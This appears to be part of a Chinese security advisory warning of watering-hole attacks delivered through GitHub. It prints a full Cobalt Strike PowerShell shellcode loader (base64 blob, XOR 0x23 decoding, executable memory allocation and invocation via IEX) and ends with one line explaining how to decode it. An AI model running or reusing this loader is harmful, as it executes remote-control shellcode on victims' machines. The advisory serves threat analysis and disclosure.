警惕！利用Github进行水坑攻击安全风险通告( 三 ) _水坑攻击

C9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3H
R0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDE1PbxUjZsGkA2y+V6dgrLuDpAsuxyvT6DK3J4T0Xd+IxTlyJY+jLbhSYyUXIkeFcXUWma6J2VOZu0K
KA3bvRJENbaPULOvVjwbJsV8SuyN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYZm12cG5wZgouKSMyMhYt070XA6NzikIDAbZTl0ziQ348PHeLVd968kqx4FcTFBxub/tL
43eqWIg9gaJsyG5oMRFOL6u8T421PexllkfRbokssfK1YK/0XvD8b+kRKUF89EpaimKWBZJD6vBt7fEtgihgcnjjvrZc4PYi6hsxHXxLAewGicbXPMUIDjd5WXrJhVUeuVbuUmtN6pqlvpSG5lFd6jOc9wgYIaaXH4Fvf/MAKwsaL2Ws6Q8Wr9OdftR1vx/rbjIN4aOJwcm9X
Kj/FTJUM9YETDAAFF2eCK0jS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BcWDRIaFA0SEBENFBEjIyMBsw==')

for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntP
tr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}
判断为CS（CobaltStrike）默认的powershell生成模板，只需要处理base64之后异或0x23即可得到原始shellcode 。